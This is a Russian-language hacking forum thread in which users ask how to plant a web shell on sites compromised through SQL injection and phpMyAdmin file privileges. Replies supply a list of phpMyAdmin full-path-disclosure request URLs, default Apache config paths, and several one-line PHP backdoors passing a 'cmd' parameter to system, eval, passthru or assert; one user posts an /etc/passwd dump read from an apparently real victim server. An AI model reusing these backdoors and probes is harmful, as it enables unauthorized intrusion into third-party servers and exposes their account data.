Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. heJiZzZ

    heJiZzZ Member

    Joined:
    1 Jun 2009
    Messages:
    90
    Likes Received:
    18
    Reputations:
    10
    Через скулю получил доступ к phpMyAdmin, file_priv=Y, хочу залить шелл, но понял что не знаю полный пусть до папки! При раскрутке скули ошибок с раскрытием путей не было. Можно ли как нибудь средствами phpMyAdmin узнать путь, куда можно шелл ливануть?
     
  2. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,450
    Likes Received:
    772
    Reputations:
    834
    попробуй подобрать для начало дефолтный путь до файла конфигов httpd.conf, в нем посмотри диру в какой сайт установлен, попробуй с нее index.php прочитать, если найдешь то пробуй заливаться в папки с изображениями или авами они часто с полными правами, что дает возможность заливаться...


    P.S: вот список дефолтных логов можешь тут взглянуть https://forum.antichat.ru/thread49775-default.html

    еще также может гугл помочь с раскрытием путей попробуй дорк такого плана
     
    _________________________
    #20302 winstrool, 30 Apr 2012
    Last edited: 30 Apr 2012
    1 person likes this.
  3. shell_c0de

    shell_c0de Hack All World

    Joined:
    7 Jul 2009
    Messages:
    1,125
    Likes Received:
    601
    Reputations:
    684
    ищи phpinfo
    или
    запросы которые могут привести к раскрытию путей
    Code:
    Full path disclosure :
    /sсriрts/check_lang.php
    /themes/darkblue_orange/layout.inc.php
    /index.php?lang[]=
    /index.php?target[]=
    /index.php?db[]=
    /index.php?goto[]=
    /left.php?server[]=
    /index.php?table[]=
    /server_databases.php?token=your_token&sort_by="
    /index.php?db=information_schema&token=your_token&tbl_group[]=
    /db_printview.php?db="
    /sql.php?back[]=
    libraries/string.lib.php
    libraries/storage_engines.lib.php
    libraries/sqlparser.lib.php
    libraries/sql_query_form.lib.php
    libraries/select_theme.lib.php
    libraries/select_lang.lib.php
    libraries/relation_cleanup.lib.php
    libraries/left_header.inc.php
    libraries/import.lib.php
    libraries/header_meta_style.inc.php
    libraries/grab_globals.lib.php
    libraries/get_foreign.lib.php (get_foreign.lib.php?field=foo&foreigners[foo]=foo)
    libraries/display_tbl_links.lib.php (display_tbl_links.lib.php?doWriteModifyAt=left&edit_url=foo)
    libraries/display_import.lib.php
    libraries/display_export.lib.php
    libraries/display_create_table.lib.php
    libraries/display_create_database.lib.php
    libraries/db_table_exists.lib.php
    libraries/database_interface.lib.php
    libraries/common.lib.php
    libraries/check_user_privileges.lib.php
    libraries/charset_conversion.lib.php (charset_conversion.lib.php?cfg[AllowAnywhereRecoding]=true&allow_recoding=true)
    libraries/sqlvalidator.lib.php (libraries/sqlvalidator.lib.php?cfg[SQLValidator]=use=TRUE)
    libraries/import/sql.php
    libraries/fpdf/ufpdf.php
    libraries/auth/cookie.auth.lib.php (libraries/auth/cookie.auth.lib.php?coming_from_common=true)
     
    _________________________
    1 person likes this.
  4. Ereee

    Ereee Reservists Of Antichat

    Joined:
    1 Dec 2011
    Messages:
    602
    Likes Received:
    373
    Reputations:
    267
    Чаще:
    /etc/conf/httpd/httpd.conf
     
  5. skier529

    skier529 New Member

    Joined:
    8 May 2009
    Messages:
    36
    Likes Received:
    0
    Reputations:
    0
    Пытаюсь залить шелл средствами MySQL след. образом:

    Выдает такую ошибку:

    Путь /var/www/html/jcbi/docs/ точно существует.

    Помогите, пожалуйста, разобраться.
     
  6. skier529

    skier529 New Member

    Joined:
    8 May 2009
    Messages:
    36
    Likes Received:
    0
    Reputations:
    0
    Т.е вот так нужно проверять?
    Там такая же ошибка вылазит...

    Кстати, подскажите, что значит вот это: "<?+system($_REQUEST['cmd']);+?>"?
    Почему именно параметр 'cmd'?
     
  7. mironich

    mironich Elder - Старейшина

    Joined:
    27 Feb 2011
    Messages:
    742
    Likes Received:
    73
    Reputations:
    19
    Да пофигу как называть)
    Код переданный через cmd выполниться в системе.
     
    1 person likes this.
  8. Ereee

    Ereee Reservists Of Antichat

    Joined:
    1 Dec 2011
    Messages:
    602
    Likes Received:
    373
    Reputations:
    267
    Ага, только щас system() не в моде, через него php-код не выполнишь(в некоторых случаях эта ф-я даже отключена).
     
    1 person likes this.
  9. skier529

    skier529 New Member

    Joined:
    8 May 2009
    Messages:
    36
    Likes Received:
    0
    Reputations:
    0
    Ну вот получу я шелл вида: site.ru/shell.php?cmd=phpinfo() и что дальше?

    Что в моде?) Через админку только?
     
  10. shell_c0de

    shell_c0de Hack All World

    Joined:
    7 Jul 2009
    Messages:
    1,125
    Likes Received:
    601
    Reputations:
    684
    http://forum.antichat.ru/thread191917-easy+shell.html
     
    _________________________
  11. skier529

    skier529 New Member

    Joined:
    8 May 2009
    Messages:
    36
    Likes Received:
    0
    Reputations:
    0
    И, если кому-то не сложно, напишите плиз как узнать полный путь для заливки шелла.
    Просто на глаза ничего подобного еще не попадалось.
     
  12. mironich

    mironich Elder - Старейшина

    Joined:
    27 Feb 2011
    Messages:
    742
    Likes Received:
    73
    Reputations:
    19
    Исчи баги с раскрытием пути под твой двиг, попробуй вызвать ошибку, глянь мб errrorlog криво лежит, пройдись гуглом по сайту.
     
  13. mix0x0

    mix0x0 Active Member

    Joined:
    1 Nov 2010
    Messages:
    379
    Likes Received:
    188
    Reputations:
    92
    Смотрите в сторону 'Path Disclosure'

    раз
    два
     
    2 people like this.
  14. Га-Ноцри

    Га-Ноцри Elder - Старейшина

    Joined:
    16 Oct 2011
    Messages:
    336
    Likes Received:
    176
    Reputations:
    75
    В этом сезоне многие кутюрье, помимо <?system($_GET[cmd]);?>, который не всегда работает из-за отключенной функции system();, как верно подметил уважаемый Ereee, советуют носить бэкдоры следующего фасона:

    <? eval($_GET[cmd]); ?>
    <? passthru($_GET[cmd]); ?>
    <? eval($_REQUEST[cmd]); ?>
    <? passthru($_REQUEST[cmd]); ?>
    <? assert($_GET[cmd]); ?>
     
  15. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    376
    Likes Received:
    343
    Reputations:
    99
    Можно добавить еще функции exec(), shell_exec()
     
  16. Facecontrol

    Facecontrol New Member

    Joined:
    12 Mar 2012
    Messages:
    45
    Likes Received:
    0
    Reputations:
    0
    Помогите мне пожалуйста покажите мне где среди этого всего пароль юзера для подключения по ftp hsplusdesignbe:x:3456:101::/var/www/html:/ftponly sphera_pop:x:3456:101::/:/bin/sh root:x:0:0::/: bin:x:1:1:bin:/bin: daemon:x:2:2:daemon:/sbin: adm:x:3:4:adm:/var/adm: lp:x:4:7:lp:/var/spool/lpd: sync:x:5:0:sync:/sbin: shutdown:x:6:0:shutdown:/sbin: halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail: news:x:9:13:news:/var/spool/news: uucp:x:10:14:uucp:/var/spool/uucp: operator:x:11:0:eek:perator:/root: games:x:12:100:games:/usr/games: gopher:x:13:30:gopher:/usr/lib/gopher-data: gdm:x:42:42::/home/gdm: xfs:x:43:43:X Font Server:/etc/X11/fs: nobody:x:99:99:Nobody:/: ftp:x:3456:101::/ftp/pub/anonymous:/ftponly info:x:3456:101::/ftp/pub/info:/ftponly tsjaark:x:3456:101::/var/www/html/tsjaark:/ftponly test:x:3456:101::/ftp/pub/test:/ftponly
     
  17. Faaax

    Faaax Banned

    Joined:
    30 Aug 2010
    Messages:
    428
    Likes Received:
    48
    Reputations:
    11
    тут нет паролей это ты просто прочитал /etc/passwd
     
  18. Facecontrol

    Facecontrol New Member

    Joined:
    12 Mar 2012
    Messages:
    45
    Likes Received:
    0
    Reputations:
    0
    А что вообще из этого полезного можно извлечь?
     
    #20318 Facecontrol, 2 May 2012
    Last edited: 2 May 2012
  19. AlexPage

    AlexPage New Member

    Joined:
    28 Apr 2012
    Messages:
    8
    Likes Received:
    1
    Reputations:
    1
    Facecontrol, у тебя есть читалка файлов на сервере (или как ты его получил?). Можешь почитать конфиги апача/сайта и т.д. Если это инклуд, то можешь исполнять свой код (возможно). Почитай об инклуде тут: _http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/
     
  20. Facecontrol

    Facecontrol New Member

    Joined:
    12 Mar 2012
    Messages:
    45
    Likes Received:
    0
    Reputations:
    0
    Я с помощью SQL-inj прочитал этот файл
     
Loading...
Thread Status:
Not open for further replies.